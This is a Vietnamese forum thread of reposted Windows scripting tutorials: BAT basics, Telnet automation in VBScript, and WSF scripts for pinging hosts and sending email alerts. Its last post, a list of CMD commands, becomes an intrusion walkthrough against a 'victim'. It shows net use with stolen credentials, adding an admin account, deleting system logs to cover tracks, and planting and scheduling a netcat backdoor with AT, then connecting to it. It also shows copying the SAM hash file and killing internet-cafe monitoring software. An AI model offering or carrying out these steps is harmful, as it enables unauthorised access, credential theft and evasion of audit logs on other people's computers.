Change background image
LOVE quotion

Bắt đầu từ 4.53' thứ Hai ngày 17/10/2011


You are not connected. Please login or register

Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down  Thông điệp [Trang 1 trong tổng số 1 trang]

Prosperity
Prosperity Tích cực

Cấp bậc: Tích cực

Giới tính : Nam

Bài viết : 466

Danh vọng : 822

Uy tín : 0

Hướng dẫn tạo và sử dụng file BAT trên Windows

Quản Trị Mạng - Tập tin Batch (.bat) là cách để thực thi các công việc trên máy tính một cách tự động. Bạn có thể tự động hóa các tác vụ hàng ngày, rút ngắn thời gian cần thiết khi làm việc nào đó, và biến một quá trình phức tạp thành điều gì đó mà bất cứ ai cũng có thể làm được. Từ khi chương trình như AutoHotkey ra đời, nhiều người đã không muốn mất thời gian để viết hay tìm hiểu về tập tin .bat, thậm chí họ không biết những gì mà nó có thể làm.

Trong bài viết này chúng tôi sẽ hướng dẫn các bạn cách tạo một file batch đơn giản và một số điều cơ bản về nó. Đồng thời bạn sẽ được cung cấp một số nguồn tài nguyên cho việc học và viết những tập tin batch.

Giả sử bạn thường xuyên gặp các vấn đề về mạng, và luôn phải mở hộp thoại command prompt để nhập vào các lệnh như ipconfig, hay Ping tới Google để kiểm tra sự cố. Trong khi đó, chỉ cần một file BAT đơn giản sẽ giúp công việc này hiệu quả hơn, bạn còn có thể dùng file này cho tất cả các máy tính khác nếu muốn.

Bước 1: Tạo file BAT

Đầu tiên bạn tạo một text document mới trên desktop của mình (chuột phải chọn New > text document). Kích đúp chuột để mở file này, vào menu File > Save As..., tại cửa sổ Save As bạn nhập tên cho tập tin và thêm đuôi ".bat" (không có dấu nháy kép). Ví dụ chúng tôi đặt tên là testBAT.bat.

Tiếp theo, tại phần Save as Type chọn All Files (thay cho Text Document (*.txt)), kích Save để lưu lại.

Lệnh CMD và cách tạo file BAT trên Windows Batch-1
Bước 2: Một số code cơ bản

Nếu bạn đã biết cách chạy những dòng lệnh trong command prompt, bạn sẽ có một Wiz cho việc tạo file BAT bởi chúng có cùng một thứ ngôn ngữ. Tất cả những gì bạn cần làm là "nói" cho command prompt biết rằng bạn muốn đặt các lệnh trong cùng một file, thay vì gõ chúng mỗi khi chạy command prompt. Điều này không những giúp bạn tiết kiệm thời gian và công sức mà còn cho phép đưa vào một số logic (như vòng lặp đơn giản, câu lệnh có điều kiện...) đó là những thủ tục có khả năng lập trình về mặt khái niệm.

Sau đây là 7 lệnh đơn giản mà bạn nên biết:


  • TITLE: tên cửa sổ cho tập tin BAT.
  • ECHO: lệnh in của file BAT. Bất cứ điều gì sau ECHO sẽ được hiển thị trong command prompt (như văn bản) trên từng dòng.
  • ECHO OFF: lệnh này thường được đặt trên đầu của file BAT. Khi chạy file BAT có lệnh này, các lệnh phía dưới ECHO OFF sẽ không được hiển thị (tức là chỉ có nội dung, không cho biết lệnh nào được dùng).
  • PAUSE: khi sử dụng lệnh này, một thông báo “press any key to continue…” sẽ hiển thị trên màn hình, toàn bộ lệnh trong file BAT sẽ tạm dừng cho đến khi bạn nhấn phím bất kỳ để khởi động lại. Bằng cách này bạn sẽ có cơ hội nhìn thấy những gì đang diễn ra trên màn hình.
  • CLS: làm sạch màn hình cửa sổ DOS (rất hữu ích khi chúng trở nên dày đặc và lộn xộn).
  • IPCONFIG: thông tin về mạng hiển thị trên DOS (rất hữu ích đối với các nhà quản trị mạng).
  • PING: ping đến địa chỉ IP, cho biết bạn có thể liên hệ với máy tính đó hay không. Lệnh này cũng trả về độ trễ (ping time) và mặc định sẽ ping 3 lần.


Bước 3: Một số logic

Chúng ta cần lập kế hoạch cho chương trình của mình. Bất kỳ một nhà lập trình giỏi nào cũng suy nghĩ về khuôn khổ chung của công việc trước khi tiến hành đánh dấu gạch ngang vào những gì cần làm. Điều này giúp ngăn ngừa những sai lầm logic rất khó thực hiện lại.

Đối với chương trình trong bài viết này, chúng ta cần kiểm tra hệ thống mạng máy tính và những thiết lập internet với lệnh “ipconfig /all”, sau đó rà soát thông tin. Cuối cùng ping tới google.com để tìm hiểu xem chúng ta thực sự có quyền truy cập internet. Nếu mọi thứ đều tốt đẹp, ta sẽ cho tạm dừng chương trình.

Bước 4: Viết nội dung cho file BAT

Để chỉnh sửa nội dung cho tập tin .bat, kích chuột phải vào đó chọn “edit”. File BAT sẽ được mở bằng trình soạn thảo Notepad, ở đây bạn sẽ thấy một trang trống và sẵn sàng cho chúng ta nhập nội dung vào đó.

(Mỗi lệnh sẽ có dòng chú thích dạng CODE ::Comment, với phần in đậm là câu lệnh mà ta sử dụng).

ECHO OFF
::CMD se khong hien thi lenh nao duoc thu thi phia duoi.
ECHO QuanTriMang: Demo tao file BAT
:: In ra dong van ban
IPCONFIG /ALL
:: Hien thi thong tin ve mang tren cua so command prompt
PAUSE
:: Tam dung thuc thi cac lenh khac de nguoi dung xem cac thong tin quan trong.
PING www.google.com
:: Ping toi trang Google.com
ECHO Toan bo thong tin ve Google Ping duoc.
::In ra dong van ban
PAUSE
:: Cho phep nguoi dung xem ket qua. Boi vi day la dong lenh cuoi cung nen sau khi nhan phim bat ky, cua so command se duoc dong lai.


Bước 5: Chạy file BAT vừa tạo

Sau khi chèn nội cung cho file BAT, bạn lưu lại rồi kích đúp chuột vào đó để chạy. Màn hình sẽ hiển thị kết quả như sau:

Lệnh CMD và cách tạo file BAT trên Windows Batch-2
Vậy là bạn đã thành công!

Nếu bạn muốn tìm hiểu thêm về các file BAT, có thể xem các lệnh có sẵn tại đây. Sau đó bạn có thể viết các chương trình riêng cho mình hoặc tham khảo các ví dụ có sẵn tại đây.

Sử dụng các tập tin BAT là giải pháp thực sự hữu ích để chạy các chương trình (chẳng hạn như Java) chỉ với một dòng lệnh, giúp tiết kiệm thời gian thay vì phải gõ các dòng lệnh từ đầu. Sau khi nắm rõ được cách thức hoạt động và các lệnh của nó, người dùng có thể dễ dàng tạo cho mình những file phục vụ cho công việc riêng của mình một cách nhanh chóng.

Đ.Hải (Nguồn MakeUseOf)
      
Prosperity
Prosperity Tích cực

Cấp bậc: Tích cực

Giới tính : Nam

Bài viết : 466

Danh vọng : 822

Uy tín : 0

Tự động hóa các lệnh TELNET sử dụng VB Script

Quản Trị Mạng - Việc xử lý công việc hàng loạt bằng file .bat (batch job) và gần đây là sử dụng Windows scripts (.wsf) đang là sự lựa chọn hàng đầu của các nhà quản trị mạng, nhằm tăng hiệu suất công việc một cách tối ưu nhất. Sử dụng batch job bạn có thể tự động cài đặt và gỡ bỏ các ứng dụng, kiểm kê phần mềm hay thiết lập cho hệ điều hành của toàn bộ máy tính trong mạng. Tuy nhiên có những tác vụ nhất định mà đôi khi cần qua nhiều lớp xác thực, chẳng hạn như TELNET.

Lệnh CMD và cách tạo file BAT trên Windows Telnet
TELNET (viết tắt của TErminaL NETwork) là một giao thức mạng (network protocol) được dùng trên các kết nối với Internet hoặc các kết nối tại mạng máy tính cục bộ LAN. Mục đích của giao thức TELNET là cung cấp một phương tiện truyền thông chung chung, có tính lưỡng truyền, dùng độ rộng 8 bit, định hướng byte.

Nhiều nhà quản trị mạng sử dụng TELNET cho thiết bị chuyển mạch để truy vấn hoặc thiết lập các cổng, theo dõi tình trạng hoạt động hệ thống, thậm chí là khởi động lại thiết bị mạng từ dòng lệnh thông qua TELNET. Do đó sẽ tiện lợi hơn rất nhiều nếu bạn có thể tự động hóa các công việc TELNET giống như batch jobs.

Thực ra, nếu bạn đã quen với việc sử dụng VB script để tạo Windows scripts, VB script cung cấp một tính năng rất hữu ích khi bạn thiết lập Windows Shell script cho đối tượng, sau đó phát hành đối tượng đó một cách cẩn thận theo thời gian bởi câu lệnh. Về cơ bản, đây giống như bạn đang ngồi trước một cửa sổ lệnh và gõ vào đó. Sự khác biệt duy nhất là Windows script sẽ gửi cửa sổ lệnh đến cho bạn.

Tự động hóa TELNET Job

Về cơ bản chúng ta có hai phần cần làm cho tác vụ này. Bạn cần thiết lập trình tự các câu lệnh muốn thông qua trong session tiêu biểu của TELNET.

Trong ví dụ này, chúng tôi có 5 thiết bị trên hệ thống mạng cần khởi động từ xa thông qua TELNET bằng cách sử dụng 4 lệnh đơn giản. Đầu tiên là sử dụng địa chỉ IP và một cổng cụ thể. Tiếp theo một menu xuất hiện, nhấn Enter.

Lệnh CMD và cách tạo file BAT trên Windows Telnet1
Chọn một số tương ứng với các chức năng ở phần MAIN MENU, nhấn Enter.

Lệnh CMD và cách tạo file BAT trên Windows Telnet2
Bây giờ chúng ta cõ những phương pháp khác nhau để làm điều này. Một số người thích sử dụng TST script. Nhưng nó có phần phức tạp đối với người chưa có kinh nghiệm. TCL cũng là một ngôn ngữ kịch bản tương tự, được dùng nhiều năm qua. Tuy nhiên ở đây chúng tôi sẽ hướng dẫn các bạn sử dụng một tập tin VB script để thực hiện các tác vụ trong khoảng thời gian ngắn nhất, đơn giản nhất.

Để làm điều này, đặt toàn bộ đoạn code sau vào một tập tin, chẳng hạn AutoTELNET.wsf, và sau đó kích đúp chuột vào để chạy:

Đầu tiên, thiết lập TELNET:

<job>
<script language="VBScript">
Option Explicit
On Error Resume Next
Dim WshShell
set WshShell=CreateObject("WScript.Shell")
WshShell.run "cmd.exe"
WScript.Sleep 1000
'Send commands to the window as needed - IP and commands need to be customized
'Step 1 - telnet to remote IP'
WshShell.SendKeys "telnet xx.xx.xx.73 9999"
WshShell.SendKeys ("{Enter}")
WScript.Sleep 1000


Đoạn mã trên sẽ tự động mở một cửa sổ lệnh, sau đó TELNET đến các thiết bị cụ thể trên cổng cần kết nối. Thay thế "x" bởi IP của bạn.

Lệnh sleep sẽ cho phép đủ thời gian chờ đợi đến khi thiết bị được đáp ứng và nhắc nhở script cho lệnh tiếp theo. Vì vậy hãy đảm bảo thời gian bạn thiết lập đủ dài để hoạt động này diễn ra.

Thứ hai, bạn cần gửi từng lệnh tại mỗi thời điểm. Hãy cung cấp đủ thời gian chờ đáp ứng giữa các session TELNET.

'Step 2 - Issue Commands with pauses'
WshShell.SendKeys ("{Enter}")
WScript.Sleep 1000
WshShell.SendKeys "5"
WshShell.SendKeys ("{Enter}")
WScript.Sleep 1000


Cuối cùng đừng quên đóng cửa sổ lệnh và kết thúc script.

'Step 3 - Exit Command Window
WshShell.SendKeys "exit"
WshShell.SendKeys ("{Enter}")
WScript.Quit
</script>
</job>


Đó là toàn bộ quá trình tự động hóa TELNET, chỉ với ba bước dễ dàng trong một script không hề phức tạp. Sau khi làm quen, bạn có thể tùy chỉnh chúng theo nhu cầu của mình trong việc tự động hóa các nhiệm vụ nhằm quản lý thiết bị chuyển mạch mạng lưới, time clock hay điều khiển hệ thống từ xa thông qua TELNET.

Đ.Hải (Nguồn MakeUseOf)
      
Prosperity
Prosperity Tích cực

Cấp bậc: Tích cực

Giới tính : Nam

Bài viết : 466

Danh vọng : 822

Uy tín : 0

Một số thủ thuật trong Windows Scripting

Quản Trị Mạng - Cho dù bạn là một người làm việc trong lĩnh vực IT, chẳng hạn như một nhà thiết kế web, hoặc một nhân viên văn phòng, thậm chí là một sinh viên thì đều cần đến Windows Scripting bởi nó sẽ cung cấp cho bạn rất nhiều tiện ích. Đối với người dùng Mac, họ có thể sử dụng AppleScript là giải pháp hàng đầu, còn ở đây chúng tôi sẽ hướng dẫn người dùng Windows cách sử dụng Windows Scripting trong công việc của mình, và hãy đọc bài viết sau để xem nó có khả năng gì.

Bản thân Windows Scripting (WSF) là một tập tin bao gồm nhiều đoạn code và được lưu dưới dạng .wsf. Windows sẽ biên dịch và chạy trực tiếp tập tin này.

Windows Scripting thực sự mạnh mẽ hơn nhiều so với batch jobs mà các chuyên gia IT thường viết kịch bản và chạy trong nhiều năm qua. WSF cung cấp cho người dùng sức mạnh của một ngôn ngữ có cấu trúc giống như Visual Basic. Theo mặc định, bạn có thể tạo ra một VBScript hoặc file JScript WSF trên Windows và chúng đều được chạy tốt.

Trong bài viết này, chúng tôi sẽ giới thiệu tới các bạn ba công cụ điển hình mà mọi người thường dùng trong môi trường CNTT chuyên nghiệp cũng như ở nhà. Ba công cụ này bao gồm: tiếp nhận dữ liệu đầu vào từ file văn bản; ping các thiết bị khác nhau trên mạng của bạn; và gửi email thông qua kịch bản đã có sẵn.

Sức mạnh của Windows Scripting

Từ các thành phần script nhỏ lẻ bạn hoàn toàn có thể kết hợp chúng lại thành một file lớn tổng hợp để thực hiện lần lượt các tác vụ chỉ bằng một cú klick chuột. Chẳng hạn như sau bài viết này bạn có thể: lấy một danh sách IP từ đầu vào là file văn bản, ping đến các thiết bị đó và cuối cùng là gửi một email thông báo về bất kỳ thiết bị nào.

Tiếp nhận và đọc tập tin đầu vào

Bước đầu tiên của tiến trình này chúng ta sẽ học cách làm thế nào để đọc và xử lý thông tin từ một đầu vào là tập tin văn bản. Ở đây chúng ta tạo file có tên IPlist.ini (với định dạng .txt vẫn chạy bình thường nhưng chúng tôi không chắc chắn về những sự cố có thể xảy ra) nằm trong cùng thư mục với script. Nội dung tập tin này chứa một danh sách toàn bộ địa chỉ IP cần được kiểm tra. Để có thể đọc từng dòng của file văn bản này, chúng ta sử dụng script sau:

<job>
<script language="VBScript">
Option Explicit
On Error Resume Next


Dim strHost
Dim strCommand
Dim ReturnCode
Dim strLine
Dim oFSO, sFile, oFile, sText


Set Shell = wscript.createObject("wscript.shell")
Set oFSO = CreateObject("Scripting.FileSystemObject")
sFile = "c:\users\owner\scripts\IPlist.ini"
If oFSO.FileExists(sFile) Then
Set oFile = oFSO.OpenTextFile(sFile, 1)
Do While Not oFile.AtEndOfStream
sText = oFile.ReadLine
If Trim(sText) <> "" Then
strCommand = sText
wscript.echo "IP Address is: " & sText
End If
Loop
oFile.Close


Else
WScript.Echo "The file was not there."
End If
WScript.Quit
</script>
</job>


Đoạn code này sử dụng một đối tượng trong hệ thống tập tin Windows để mở file, sau đó đọc từng dòng một thời điểm cho đến cuối file.

Lệnh CMD và cách tạo file BAT trên Windows WSF-1
Trường hợp bạn đặt sai đường dẫn tập tin Iplist.ini sẽ hiển thị kết quả:

Lệnh CMD và cách tạo file BAT trên Windows WSF-2
Ping tới một Host

Sau khi đọc xong các địa chỉ IP của file gửi đến, bây giờ chúng ta tiến hành Ping tới chúng bằng Windows Scripting.
Quá trình Ping diễn ra phức tạp hơn so với việc đọc một file văn bản, bởi bạn cần sử dụng tới Windows Management Instrumentation scripting (WMI). Bạn nhập vào đoạn code sau:

<job>
<script language="VBScript">
Option Explicit
On Error Resume Next


Dim colPingResults, objPingResult, strQuery
Dim strIPtext
strIPtext = "192.168.1.105"


' WMI query
strQuery = "SELECT * FROM Win32_PingStatus WHERE Address = '" & strIPtext & "'"
Set colPingResults = GetObject("winmgmts://./root/cimv2").ExecQuery( strQuery )


' Translate query results

For Each objPingResult In colPingResults
If Not IsObject( objPingResult ) Then
Ping = False
wscript.echo strIPtext & " is not pingable"
ElseIf objPingResult.StatusCode = 0 Then
Ping = True
wscript.echo strIPtext & " is pingable"
Else
Ping = False
wscript.echo strIPtext & " is not pingable"
End If
Next
Set colPingResults = Nothing
WScript.Quit
</script>
</job>


Sau khi chạy script trên, một cửa sổ pop-up hiện ra cho biết kết quả IP đó Ping được hay không.

Lệnh CMD và cách tạo file BAT trên Windows WSF-3
Trong đoạn code này chúng ta chỉ Ping tới một địa chỉ IP duy nhất, và việc bạn cần làm là nhúng lệnh Ping vào sau mỗi địa chỉ IP được đọc ra từ file văn bản, như vậy bạn sẽ Ping được toàn bộ địa chỉ trong danh sách.

Gửi một Email

Cuối cùng, khi bạn đã có một script để kiểm tra địa chỉ IP và cửa sổ pop-up sẽ bật lên nếu gặp bất kỳ lỗi nào. Nhưng nếu phải chạy các script này hàng ngày sẽ không phải điều thú vị cho phần lớn người dùng. Thay vào đó hãy thiết lập để các sự cố được tự động gửi tới email.

Để làm điều này bạn cần biết cách gửi emai thông qua script. Trên mạng Internet có rất nhiều cách có thể thực hiện, phổ biến nhất là sử dụng phương pháp CDO.

<job>
<script language="VBScript">
Option Explicit
On Error Resume Next


Const fromEmail = "rdxxxx@gmail.com"
Const password = "xxxxxxxx"


Dim emailObj, emailConfig
Set emailObj = CreateObject("CDO.Message")
emailObj.From = alert@topsecretwriters.com
emailObj.To = "rdxxxxx@gmail.com"
emailObj.Subject = "Test Email"
emailObj.TextBody = "It Works!!"


Set emailConfig = emailObj.Configuration
emailConfig.Fields("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.gmail.com"
emailConfig.Fields("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 465
emailConfig.Fields("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
emailConfig.Fields("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
emailConfig.Fields("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = true
emailConfig.Fields("http://schemas.microsoft.com/cdo/configuration/sendusername") = fromEmail
emailConfig.Fields("http://schemas.microsoft.com/cdo/configuration/sendpassword") = password
emailConfig.Fields.Update
emailObj.Send
Set emailobj = nothing
Set emailConfig = nothing
WScript.Quit


</script>
</job>


Đoạn script trên cho phép bạn gửi bất kỳ văn bản nào trong phần thân (body) của một email cho mọi địa chỉ sử dụng dịch vụ Gmail. Bạn có thể sửa đổi các tham số để sử dụng cho các máy chủ mail SMTP khác.

Bây giờ bạn tiến hành ghép các đoạn mã trên lại với nhau. Kết quả là script sẽ đọc địa chỉ IP, Ping tới từng địa chỉ và sau đó gửi một chuỗi thông báo trong phần body tới email:

Lệnh CMD và cách tạo file BAT trên Windows WSF-4
Việc tự động hóa công việc trong lĩnh vực IT sẽ dễ dàng hơn nếu biết tận dụng sức mạnh của Windows Scripting. Bất cứ lúc nào những script này sẽ tự động kiểm tra giúp bạn, đặc biệt là với hệ thống có vô số thiết bị.

Đ.Hải (Nguồn MakeUseOf)
      
Prosperity
Prosperity Tích cực

Cấp bậc: Tích cực

Giới tính : Nam

Bài viết : 466

Danh vọng : 822

Uy tín : 0

Một số lệnh CMD trong Windows

Đọc thêm:

Click Start --> Run --> type CMD --> press Enter

1. Lệnh Ping :

ping ip/host [/t][/a][/l][/n]

- ip: địa chỉ IP của máy cần kiểm tra; host là tên của máy tính cần kiểm tra. Người ta có thể sử dụng địa chỉ IP hoặc tên của máy tính.
- Tham số /t: Sử dụng tham số này để máy tính liên tục "ping" đến máy tính đích, cho đến khi bạn bấm Ctrl + C
- Tham số /a: Nhận địa chỉ IP từ tên host
- Tham số /l : Xác định độ rộng của gói tin gửi đi kiểm tra. Một số hacker sử dụng tham số này để tấn công từ chối dịch vụ một máy tính (Ping of Death - một loại DoS), nhưng tôi nghĩ là hacker có công cụ riêng để ping một gói tin lớn như thế này, và phải có nhiều máy tính cùng ping một lượt.
- Tham số /n : Xác định số gói tin sẽ gửi đi. Ví dụ: ping 174.178.0.1/n 5

Công dụng :

+ Lệnh này được sử dụng để kiểm tra xem một máy tính có kết nối với mạng không. Lệnh Ping sẽ gửi các gói tin từ máy tính bạn đang ngồi tới máy tính đích. Thông qua giá trị mà máy tính đích trả về đối với từng gói tin, bạn có thể xác định được tình trạng của đường truyền (chẳng hạn: gửi 4 gói tin nhưng chỉ nhận được 1 gói tin, chứng tỏ đường truyền rất chậm (xấu)). Hoặc cũng có thể xác định máy tính đó có kết nối hay không (Nếu không kết nối,kết quả là Unknow host)....

2. Lệnh Tracert :

tracert ip/host

Công dụng :

+ Lệnh này sẽ cho phép bạn "nhìn thấy" đường đi của các gói tin từ máy tính của bạn đến máy tính đích, xem gói tin của bạn vòng qua các server nào, các router nào... Quá hay nếu bạn muốn thăm dò một server nào đó.

3. Lệnh Net Send, gởi thông điệp trên mạng (chỉ sử dụng trên hệ thống máy tình Win NT/2000/XP):

Net send ip/host thông_điệp_muốn_gởi

Công dụng:

+ Lệnh này sẽ gửi thông điệp tới máy tính đích (có địa chỉ IP hoặc tên host) thông điệp: thông_điệp_muốn_gởi.
+ Trong mạng LAN, ta có thể sử dụng lệnh này để chat với nhau. Trong phòng vi tính của trường tui thường dùng lệnh này để ghẹo mọi người! Bạn cũng có thể gởi cho tất cả các máy tính trong mạng LAN theo cấu trúc sau :

Net send * hello!I'm pro_hacker_invn

4. Lệnh Netstat :

Netstat [/a][/e][/n]

- Tham số /a: Hiển thị tất cả các kết nối và các cổng đang lắng nghe (listening)
- Tham số /e: hiển thị các thông tin thống kê Ethernet
- Tham số /n: Hiển thị các địa chỉ và các số cổng kết nối...
Ngoải ra còn một vài tham số khác, hãy gõ Netstat/? để biết thêm

Công dụng :

+ Lệnh Netstat cho phép ta liệt kê tất cả các kết nối ra và vào máy tính của chúng ta.

5. Lệnh IPCONFIG :



Công dụng:

+ Lệnh này sẽ cho phép hiển thị cấu hình IP của máy tính bạn đang sử dụng, như tên host, địa chỉ IP, mặt nạ mạng...

6. Lệnh FTP (truyền tải file):

ftp ip/host

Nếu kết nối thành công đến máy chủ, bạn sẽ vào màn hình ftp, có dấu nhắc như sau:

ftp>_

Tại đây, bạn sẽ thực hiện các thao tác bằng tay với ftp, thay vì dùng các chương trình kiểu Cute FTP, Flash FXP.
Nếu kết nối thành công, chương trình sẽ yêu cầu bạn nhập User name, Password. Nếu username và pass hợp lệ, bạn sẽ được phép upload, duyệt file... trên máy chủ.

Một số lệnh ftp cơ bản:

- cd thu_muc: chuyển sang thư mục khác trên máy chủ
- dir: Xem danh sách các file và thư mục của thư mục hiện thời trên máy chủ
- mdir thu_muc: Tạo một thư mục mới có tên thu_muc trên máy chủ
- rmdir thu_muc: Xoá (remove directory) một thư mục trên máy chủ
- put file: tải một file file (đầy đủ cả đường dẫn. VD: c:\tp\bin\baitap.exe) từ máy bạn đang sử dụng lên máy chủ.
- close: Đóng phiên làm việc
- quit: Thoát khỏi chương trình ftp, quay trở về chế độ DOS command.

Ngoài ra còn một vài lệnh nữa, xin mời các bạn tự tìm hiểu.

Công dụng :

+ FTP là một giao thức được sử dụng để gửi và nhận file giữa các máy tính với nhau. Windows đã cài đặt sẵn lệnh ftp, có tác dụng như một chương trình chạy trên nền console (văn bản), cho phép thực hiện kết nối đến máy chủ ftp

7. Lệnh Net View :

Net View [\\computer|/Domain[:ten_domain]]

Công dụng:

+ Nếu chỉ đánh net view [enter], nó sẽ hiện ra danh sách các máy tính trong mạng cùng domain quản lý với máy tính bạn đang sử dụng.
+ Nếu đánh net view \\tenmaytinh, sẽ hiển thị các chia sẻ tài nguyên của máy tính tenmaytinh. Sau khi sử dụng lệnh này, các bạn có thể sử dụng lệnh net use để sử dụng các nguồn tài nguyên chia sẻ này.

8. Lệnh Net Use :

Net use \\ip\ipc$ "pass" /user:"######"

- ip: địa chỉ IP của victim.
- ######: user của máy victim
- pass: password của user

Giả sử ta có đc user và pass của victim có IP là 68.135.23.25 trên net thì ta đã có thể kết nối đến máy tính đó rùi đấy! Ví dụ: user: vitim ; pass :12345 . Ta dùng lệnh sau:

Net use \\68.135.23.25\ipc$ "12345" /user:"victim"

Công dụng:

+ kết nối một IPC$ đến máy tính victim (bắt đầu quá trình xâm nhập).

9. Lệnh Net User :

Net User [username pass] [/add]

- Username : tên user cấn add
- pass : password của user cần add

Khi đã add được user vào rồii thì ta tiến hành add user này vào nhóm administrator.

Net Localgroup Adminstrator [username] [/add]

Công dụng:

+ Nếu ta chỉ đánh lệnh Net User thì sẽ hiển thị các user có trong máy tính.
+ Nếu ta đánh lệnh Net User [username pass] [/add] thì máy tính sẽ tiến hành thêm một người dùng vào.

Ví dụ: ta tiến hành add thêm một user có tên là :xuanhoa , password là :banvatoi vào với cấu trúc lệnh như sau:

Net User xuanhoa banvatoi /add

Sau đó add user xuanhoa vào nhóm adminnistrator

Net Localgroup Administrator xuanhoa /add

10. Lệnh Shutdown :

Shutdown [-m \\ip] [-t xx] [-i] [-l] [-s] [-r] [-a] [-f] [-c "commet] [-d up:xx:yy] (áp dụng cho win XP)

- Tham số -m\\ip : ra lệnh cho một máy tính từ xa thực hiên các lệnh shutdown, restart,..
- Tham số -t xx : đặt thời gian cho việc thực hiện lệnh shutdown.
- Tham số -l : logg off (lưu ý ko thể thực hiện khi remote)
- Tham số -s : shutdown
- Tham số -r : shutdown và restart
- Tham số -a : không cho shutdown
- Tham số -f : shutdown mà ko cảnh báo
- Tham số -c "comment" : lời cảnh báo trước khi shutdown
- Tham số -d up:xx:yy : ko rõ

shutdown \\ip (áp dụng win NT)

Để rõ hơn về lệnh shutdown bạn có thể gõ shutdown /? để được hướng dẫn cụ thể hơn!

Công dụng: Shutdown máy tính.

11. Lệnh DIR :

DIR [drive:][path][filename]

Lệnh này quá căn bản rồi, chắc tui khỏi hướng dẫn, để rõ hơn bạn đánh lệnh DIR /? để được hướng dẫn.

Công dụng: Để xem file, folder.

12. Lệnh DEL :

DEL [drive:][path][filename]

Lệnh này cũng căn bản rồi, không phải nói nhiều.

Công dụng:

Xóa một file, thông thường sau khi xâm nhập vào hệ thống, ta phái tiến hành xóa dấu vết của mình để khỏi bị phát hiện. Sau đây là những files nhật ký của Win NT:

del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log


13. Lệnh tạo ổ đĩa ảo trên computer:

Net use z: \\ip\C$ ( hoặc là IPC$ )

- Z là của mình... còn C$ là của Victim

Công dụng: Tạo 1 đĩa ảo trên máy tính (lệnh này tui ko rõ nên ko thể hướng dẫn chi tiết đc)

14. Lệnh Net Time :

Net Time \\ip

Công dụng: Cho ta biết thời gian của victim, sau đó dùng lệnh AT để khởi động chương trình.

15. Lệnh AT:

AT \\ip

Công dụng:

+ Thông thường khi xâm nhập vào máy tính victim khi rút lui thì ta sẽ tặng quà lưu niệm lên máy tính victim, khi đã copy troj hoặc backdoor lên máy tính rùi ta sẽ dùng lệnh at để khởi động chúng.

Ví dụ: ở đây tui có con troj tên nc.exe (NC là từ viết tắc của NETCAT....nó là một telnet server với port 99) và đc copy lên máy victim rùi. Đầu tiên ta cần biết thời gian của victim có IP là : 68.135.23.25 .

Net Time \\68.135.23.25

Bây giờ nó sẽ phản hồi cho ta thời gian của victim, ví dụ : 12:00.

AT \\68.135.23.25 12:3 nc.exe

Đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99.

16. Lệnh Telnet:

telnet host port

Gõ telnet /? để biết thêm chi tiết. Nhưng nếu như máy victim đã dính con nc rồi thì ta chỉ cần connect đến port 99 là OKie
Code:

telnet 68.135.23.25 99

Công dụng: Kết nối đến host qua port xx

17. Lệnh COPY:

COPY /?

Dùng lệnh trên để rõ hơn!

Công dụng: Copy file, tui khỏi nói thêm nhé.

Ví dụ:chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1

Copy Index.html \\127.0.0.1\C$\index.html

nếu bạn copy lên folder winNt

Copy index.html \\127.0.0.1\admin$\index.html

muốn copy files trên máy victm thì bạn gõ vào :

Copy \\127.0.0.1\Admin$\repair\sam._c:\

18. Lệnh SET:

SET

Công dụng: Displays, sets, or removes cmd.exe enviroment variables.

19. Lệnh Nbtstat :

Nbtstat /?

Gõ lệnh trên để rõ hơn về lệnh này.

Công dụng: Display protocol statistic and curent TCP/IP connections using NBT (netbios over TCP?IP)

20. Lệnh Date :

Date /T

Công dụng:

+ Nếu chỉ gõ lệnh date thì hệ thống sẽ hiển thị ngày giờ hệ thống và yêu cầu bạn nhập ngày giờ mới để edit.
+ Nếu gõ lệnh date /t thì bạn chỉ coi thông tin về ngày giờ hệ thống!

21. Lệnh xuất thông tin thành file *.txt:

Câu lệnh >[drive]:\[path]\tenfile.txt

Công dụng: xuất một tham số nào đó ra 1 file text.

Ví dụ: bạn đánh lệnh sau:

ipconfig >C:\myip.txt

Hệ thống sẽ tạo ra file myip.txt lưu ở ổ đĩa C với thông tin là IP, Gateway, Subnet Mask

22. Lệnh openfiles:

OpenFiles /Disconnect /ID id

hoặc

OpenFiles /Disconnect /A tên-truy-cập

Công dụng: Cho biết ai đang dùng các tập tin (thư mục) mà bạn đang chia sẽ trên hệ thống mạng

23. Lệnh Recover:

Recover /?

Đánh lệnh recover /? để biết thêm chi tiết nhé!

Công dụng: Để "cứu" một file nào đó bị hỏng khi file đó nằm trên vùng đĩa hư (bad sector chăng hạn). Chỉ hoạt động khi hệ thống file của bạn là NTFS (Fat32/Fat không dùng được đâu nhé). Nó dở 1 chỗ là dùng lệnh này cho từng file một nên có nhiều file hư các bạn nên tìm tiện ích của các hãng thứ 3

24. Lệnh Tasklist :

Tasklist

Công dụng:

+ Liệt kê các tác vụ (các chương trình ứng dụng đang chạy trong bộ nhớ máy tính) chi tiết. Sẽ cho bạn biết tên process đang chạy. Process là một luồng xử lý được CPU cấp riêng khi thực thi một ứng dụng (chương trình) hay PID (Process ID). TaskList hữu ích khi dùng với Taskkill.
+ Để hiểu rõ hơn về lệnh này, hãy gõ /? sau cấu trúc lệnh nhé!

25. Lệnh Taskkill:

Đừng quên thêm /? sau cấu trúc lệnh để hiểu rõ hơn nhé!

Công dụng:

+ Để "kill" một "task" đang chạy trong bộ nhớ. Lợi hại lắm đấy, khi ra net gặp quán nào nó cái DWK hay Netcafe thì mình tắt nó đi cái một!

Ví dụ: Đầu tiên ta dùng lệnh tasklist để biết được groccess id của chương trình cần tắt.

tasklist

Ở đây tôi thí dụ như tôi cần DWK có groccess id là 524 thì ta dùng lệnh taskkill để tắt nó đi như sau:

taskkill /PID 524 /f

